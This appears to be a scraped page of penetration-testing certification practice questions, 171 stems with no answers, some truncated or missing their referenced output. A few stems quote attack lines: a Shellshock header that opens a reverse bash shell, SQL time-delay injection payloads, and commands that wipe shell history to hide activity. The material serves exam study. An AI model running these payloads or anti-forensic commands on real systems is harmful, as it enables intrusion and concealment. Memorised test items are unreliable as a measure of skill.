MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: Whenaccessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:..d index: eid in /apache/www/validate/user.php line 12..d index: uid in /apache/www/validate/user.php line 13..d index: pw in /apache/www/validate/user.php line 14..d index: acl in /apache/www/validate/user.php line 15
Question2: ion tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the.. :tive way for the tester to achieve this objective?
Question3: A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service.Which of the following methods would BEST support validation of the possible findings?
Question4: A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?
Question5: Given the following script:while True:print ("Hello World")Which of the following describes True?
Question6: During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?
Question7: A penetration tester is looking for a particular type of service and obtains the output below:I Target is synchronized with 127.127.38.0 (reference clock)I Alternative Target Interfaces:I 10.17.4.20I Private Servers (0)I Public Servers (0)I Private Peers (0)I Public Peers (0)I Private Clients (2)I 10.20.8.69 169.254.138.63I Public Clients (597)I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118I 68.56.205.98I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682 I Other Associations (1)|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7Which of the following commands was executed by the tester?
Question8: A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive?
Question9: A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
Question10: A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?
Question11: A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?
Question12: Which of the following is the most secure method for sending the penetration test report to the client?
Question13: A penetration tester is performing an assessment for an organization and must gather valid user credentials.Which of the following attacks would be best for the tester to use to achieve this objective?
Question14: A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
Question15: A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?
Question16: A security firm is discussing the results of a penetration test with a client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following best describes the action taking place?
Question17: Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?
Question18: A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:nmap -O -A -sS -p- 100.100.100.50Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
Question19: Which of the following is a rules engine for managing public cloud accounts and resources?
Question20: A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?
Question21: Which of the following assessment methods is the most likely to cause harm to an ICS environment?
Question22: A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"[ATTEMPT] target 192.168.1.112 - login "root" - pass "tyuio"Which of the following is the penetration tester conducting?
Question23: The following output is from reconnaissance on a public-facing banking website:Based on these results, which of the following attacks is MOST likely to succeed?
Question24: A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?
Question25: You are a penetration tester running port scans on a server.INSTRUCTIONSPart 1: Given the output, construct the command that was used to generate this output from the available options.Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question26: A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
Question27: A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?
Question28: A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.Which of the following tools would be BEST to use for this purpose?
Question29: A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user's work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?
Question30: During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.Which of the following vulnerabilities was the attacker trying to exploit?
Question31: A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?
Question32: During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:nmap -sV -- script ssl-enum-ciphers -p 443 remotehost| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA| TLS_ECDHE_RSA_WITH_RC4_128_SHA| TLS_RSA_WITH_RC4_128_SHA (rsa 2048)TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)Which of the following should the penetration tester include in the report?
Question33: A penetration tester is enumerating shares and receives the following output:Which of the following should the penetration tester enumerate next?
Question34: A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?
Question35: A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:Which of the following would be a recommendation for remediation?
Question36: During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
Question37: A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?
Question38: A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode Which of the following is the most likely reason the penetration tester ran this command?
Question39: A penetration tester conducted a discovery scan that generated the following:Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
Question40: Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
Question41: User credentials were captured from a database during an assessment and cracked using rainbow tables.Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
Question42: During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT?
Question43: During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:
Question44: A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
Question45: A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
Question46: A penetration tester gains access to a system and establishes persistence, and then runs the following commands:cat /dev/null > temptouch -r .bash_history tempmv temp .bash_historyWhich of the following actions is the tester MOST likely performing?
Question47: A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
Question48: Which of the following members of a client organization are most likely authorized to provide a signed authorization letter prior to the start date of a penetration test?
Question49: A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?
Question50: Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
Question51: A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.Which of the following is the BEST action for the penetration tester to take?
Question52: A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?
Question53: Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?
Question54: Which of the following best explains why communication is a vital phase of a penetration test?
Question55: Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
Question56: Given the following output:User-agent:*Disallow: /author/Disallow: /xmlrpc.phpDisallow: /wp-adminDisallow: /page/During which of the following activities was this output MOST likely obtained?
Question57: In Java and C/C++, variable initialization is critical because:
Question58: An organization wants to identify whether a less secure protocol is being utilized on a wireless network.Which of the following types of attacks will achieve this goal?
Question59: During an engagement, a penetration tester found the following list of strings inside a file:Which of the following is the BEST technique to determine the known plaintext of the strings?
Question60: A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
Question61: A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?
Question62: A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?
Question63: A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
Question64: A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
Question65: Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
Question66: Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
Question67: A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?
Question68: The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:
Question69: A penetration tester is testing a new API for the company's existing services and is preparing the following script:Which of the following would the test discover?
Question70: A penetration tester runs the following command:nmap -p- -A 10.0.1.10Given the execution of this command, which of the following quantities of ports will Nmap scan?
Question71: The attacking machine is on the same LAN segment as the target host during an internal penetration test.Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?
Question72: During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:<% String id = request.getParameter("id"); %>Employee ID: <%= id %>Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?
Question73: A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
Question74: An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems. Which of the following documents addresses this requirement?
Question75: During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
Question76: A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?
Question77: A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Question78: A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?
Question79: A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?
Question80: During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.While reading the script, the penetration tester noticed the following lines of code:Which of the following was the script author trying to do?
Question81: A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?
Question82: A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk?
Question83: Which of the following describes how a penetration tester could prioritize findings in a report?
Question84: A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?
Question85: Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client?
Question86: Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
Question87: Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?
Question88: A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?
Question89: After running the enum4linux.pl command, a penetration tester received the following output:Which of the following commands should the penetration tester run NEXT?
Question90: A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:* Connected to 10.2.11.144 (::1) port 80 (#0)> GET /readmine.html HTTP/1.1> Host: 10.2.11.144> User-Agent: curl/7.67.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200< Date: Tue, 02 Feb 2021 21:46:47 GMT< Server: Apache/2.4.41 (Debian)< Content-Length: 317< Content-Type: text/html; charset=iso-8859-1<<!DOCTYPE html><html lang="en"><head><meta name="viewport" content="width=device-width" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>WordPress › ReadMe</title><link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" /></head>Which of the following tools would be BEST for the penetration tester to use to explore this site further?
Question91: A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following tools will help the tester prepare an attack for this scenario?
Question92: A penetration tester is attempting to discover live hosts on a subnet quickly.Which of the following commands will perform a ping scan?
Question93: A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:Which of the following represents what the penetration tester is attempting to accomplish?
Question94: Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?
Question95: A penetration tester managed to exploit a vulnerability using the following payload:IF (1=1) WAIT FOR DELAY '0:0:15'Which of the following actions would best mitigate this type ol attack?
Question96: A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
Question97: A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?
Question98: An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?
Question99: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.INSTRUCTIONSAnalyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question100: A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
Question101: Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?
Question102: A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
Question103: Which of the following is the most common vulnerability associated with loT devices that are directly connected to the internet?
Question104: A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?
Question105: A penetration tester is reviewing the security of a web application running in an laaS compute instance.Which of the following payloads should the tester send to get the running process credentials?
Question106: A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
Question107: Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
Question108: As part of an active reconnaissance, a penetration tester intercepts and analyzes network traffic, including API requests and responses. Which of the following can be gained by capturing and examining the API traffic?
Question109: A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
Question110: A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:http://company.com/catalog.asp?productid=22The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:http://company.com/catalog.asp?productid=22;WAITFORDELAY'00:00:05'Which of the following should the penetration tester attempt NEXT?
Question111: A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
Question112: A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?
Question113: A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
Question114: A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.Which of the following actions, if performed, would be ethical within the scope of the assessment?
Question115: Given the following code:$p = (80, 110, 25)$network = (192.168.0)$range = 1 .. 254$ErrorActionPreference = 'silentlycontinue'$Foreach ($add in $range)$Foreach ($x in $p){ {$ip = "{0} . {1} -F $network, $add"If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip){$socket = new-object System.Net. Sockets. TcpClient (&ip, $x)If ($socket. Connected) { $ip $p open"$socket. Close () }}}}Which of the following tasks could be accomplished with the script?
Question116: After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:The tester then runs the following command from the previous exploited system, which fails:Which of the following explains the reason why the command failed?
Question117: A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?
Question118: Given the following code:Which of the following data structures is systems?
Question119: Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?
Question120: A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve This objective?
Question121: A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?
Question122: Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?
Question123: A penetration tester wrote the following script to be used in one engagement:Which of the following actions will this script perform?
Question124: A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?
Question125: A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?
Question126: Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?
Question127: Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
Question128: A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error?
Question129: A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:Pre-engagement interaction (scoping and ROE)Intelligence gathering (reconnaissance)Threat modelingVulnerability analysisExploitation and post exploitationReportingWhich of the following methodologies does the client use?
Question130: Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?
Question131: A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?
Question132: An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?
Question133: A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:Have a full TCP connectionSend a "hello" payloadWalt for a responseSend a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective?
Question134: Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?
Question135: A client asks a penetration tester to retest its network a week after the scheduled maintenance window.Which of the following is the client attempting to do?
Question136: A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.Which of the following tools can help the tester achieve this goal?
Question137: A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?
Question138: A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?
Question139: Which of the following factors would a penetration tester most likely consider when testing at a location?
Question140: An Nmap scan of a network switch reveals the following:Which of the following technical controls will most likely be the FIRST recommendation for this device?
Question141: A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
Question142: A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.INSTRUCTIONSSelect the appropriate answer(s), given the output from each section.Output 1
Question143: Which of the following is most important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
Question144: A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?
Question145: A penetration tester runs the following command on a system:find / -user root -perm -4000 -print 2>/dev/nullWhich of the following is the tester trying to accomplish?
Question146: Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
Question147: Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?
Question148: A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:Which of the following is the most likely explanation for the output?
Question149: A potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a testing component crashes a system or service and leaves them unavailable for both legitimate users and further testing. Which of the following best describes this concept?
Question150: During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?
Question151: A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following combinations of tools would the penetration tester use to exploit this script?
Question152: A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras.Which of the following is a technique the tester can use to gain access to the IT framework without being detected?
Question153: A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?
Question154: A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
Question155: Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?
Question156: The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?
Question157: A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
Question158: Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
Question159: A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue.Which of the following would BEST protect against this vulnerability?
Question160: A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.INSTRUCTIONSSelect the tool the penetration tester should use for further investigation.Select the two entries in the robots.txt file that the penetration tester should recommend for removal.
Question161: A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen.A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?
Question162: A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
Question163: A penetration tester wrote the following Bash script to brute force a local service password:..ting as expected. Which of the following changes should the penetration tester make to get the script to work?
Question164: After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?
Question165: A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
Question166: A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?
Question167: A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:Which of the following should the penetration tester do NEXT?
Question168: A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?
Question169: A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
Question170: A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack?
Question171: A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?